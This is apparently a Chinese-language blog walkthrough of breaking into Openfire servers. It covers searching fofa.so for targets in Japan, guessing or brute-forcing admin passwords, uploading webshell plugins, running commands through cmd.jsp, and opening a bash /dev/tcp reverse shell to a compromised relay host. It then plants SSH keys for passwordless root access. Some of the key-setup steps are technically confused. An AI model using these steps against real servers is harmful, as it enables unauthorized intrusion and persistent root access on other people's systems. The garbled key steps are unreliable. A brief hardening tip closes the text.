OpenFire后臺插件上傳獲取webshell及免密碼登錄linux服務(wù)器

     本次***源于高校任務(wù)，在***過程中發(fā)現(xiàn)，對方IP地址段安裝有opernfire，服務(wù)器8080端口可以正常訪問，后面通過了解Openfire是開源的、基于可拓展通訊和表示協(xié)議(XMPP)、采用Java編程語言開發(fā)的實(shí)時(shí)協(xié)作服務(wù)器。 Openfire安裝和使用都非常簡單，并利用Web進(jìn)行管理，單臺服務(wù)器可支持上萬并發(fā)用戶，一般在大型企業(yè)用的比較多。Openfire跟Jboss類似，也可以通過插件上傳來獲取Webshell，只是Openfire的插件需要修改代碼并進(jìn)行編譯，經(jīng)過研究測試，只要有登錄賬號，通過上傳插件可以獲取webshell，一般獲取的權(quán)限都較高為root系統(tǒng)權(quán)限，國外服務(wù)器一般單獨(dú)給Openfire權(quán)限，下面是整個(gè)***過程。

1.目標(biāo)獲取

（1）fofa.so網(wǎng)站使用搜索body="Openfire,版本: " && country=JP，可以獲取日本存在的Openfire服務(wù)器。如圖1所示。

圖1搜索目標(biāo)

2.暴力或者使用弱口令登錄系統(tǒng)

   一般弱口令admin/admin、admin/admin888、admin/123456，如果不是這些請直接使用burpsuite進(jìn)行暴力破解，能夠正常訪問的網(wǎng)站，如圖2所示，openfire可能開放不同端口。

圖2openfire后臺登陸地址

3.進(jìn)入后臺

   輸入密碼正確后，如圖3所示，進(jìn)入后臺，可以查看服務(wù)器設(shè)置，查看用戶/用戶群，查看會話，分組聊天以及插件等信息。

圖3進(jìn)入后臺

4.查看并上傳插件

   單擊插件，再其中可以看到所有的插件列表，在上傳插件下單擊上傳插件，選擇專門生成的openfire帶webshell的插件，如圖4所示。

圖4上傳插件

在本次測試中，從互聯(lián)網(wǎng)收集了連個(gè)插件，如圖5所示，均成功上傳。

圖5上傳帶webshell的插件

5.獲取webshell

（1）helloworld插件獲取webshell

  單擊服務(wù)器-服務(wù)器設(shè)置，如圖6所示，如果helloworld插件上傳并運(yùn)行成功，則會在配置文件下面生成一個(gè)用戶接口設(shè)置。單擊該鏈接即可獲取webshel，如圖7所示。

圖6查看服務(wù)器設(shè)置

圖7獲取webshell

（2）broadcast插件獲取webshell

   通過url+ plugins/broadcast/webshell文件名稱來和獲取：

http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/cmd.jsp?cmd=whoami

http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/browser.jsp

   在helloworld插件中也可以通過地址來獲取

http://xxx.xxx.xxx.xxx:8080/plugins/helloworld/chakan.jsp

  如圖8，圖9所示，分別獲取broadcast的webshell以及查看當(dāng)前用戶權(quán)限為root。

圖8獲取當(dāng)前用戶權(quán)限

圖9獲取webshell

6.免root密碼登錄服務(wù)器

   ***到這里按照過去的思路應(yīng)該已經(jīng)結(jié)束，不過筆者還想嘗試另外一種思路，雖然我們通過webshell可以獲取/etc/shadow文件，但該root及其它用戶的密碼明顯不是那么容易被破解的。服務(wù)器上面用ssh，能否利用公私鑰來解決訪問問題。

（1）反彈到肉雞

執(zhí)行一下命令，將該服務(wù)器反彈到肉雞服務(wù)器xxx.xxx.xxx.xxx的8080端口，需要提前使用nc監(jiān)聽8080端口，也即執(zhí)行“nc-vv -l -p 8080”如圖10所示。

圖10監(jiān)聽8080端口

（2）反彈shell到肉雞

執(zhí)行命令“bash -i>& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1”反彈到肉雞，如圖11所示，獲取一個(gè)反彈shell。

圖11反彈shell

7.實(shí)際操作流程

（1）遠(yuǎn)程服務(wù)器生成公私鑰

 在被***的服務(wù)器上執(zhí)行“ssh-keygen -t rsa”命令，默認(rèn)三次回車，如圖12所示，會在root/.ssh/目錄下生成id_rsa及id_rsa.pub，其中id_rsa為服務(wù)器私鑰，特別重要，id_rsa.pub為公鑰。

圖12在遠(yuǎn)處服務(wù)器上生成公私鑰

（2）本地linux 上生成公私鑰

  在本地linux上執(zhí)行命令“ssh-keygen -t rsa”生成公私鑰，將遠(yuǎn)程服務(wù)器的id_rsa下載到本地，執(zhí)行命令“cat id_rsa > /root/.ssh/authorized_keys”命令，將遠(yuǎn)處服務(wù)器的私鑰生成到authorized_keys文件。

（3）將本地公鑰上傳到遠(yuǎn)程服務(wù)器上并生成authorized_keys

catid_rsa.pub >/root/.ssh/authorized_keys

（4）刪除多余文件

rmid_rsa.pub

rmid_rsa

（5）登錄服務(wù)器

   使用“sshroot@1xx.1xx.111.1xx”登錄服務(wù)器，不用輸入遠(yuǎn)程服務(wù)器的密碼，達(dá)到完美登錄服務(wù)器的目的。

8總結(jié)

（1）Openfire需要獲取管理員帳號和密碼，目前通殺所有幫本。Openfire最新版本為4.1.5.

（2）可以通過burpsuite進(jìn)行admin管理員帳號的暴力破解。

（3）使用openfire安全加固，可以使用強(qiáng)密碼，同時(shí)嚴(yán)格設(shè)置插件權(quán)限，建議除了必須的插件目錄外，禁用新創(chuàng)建目錄。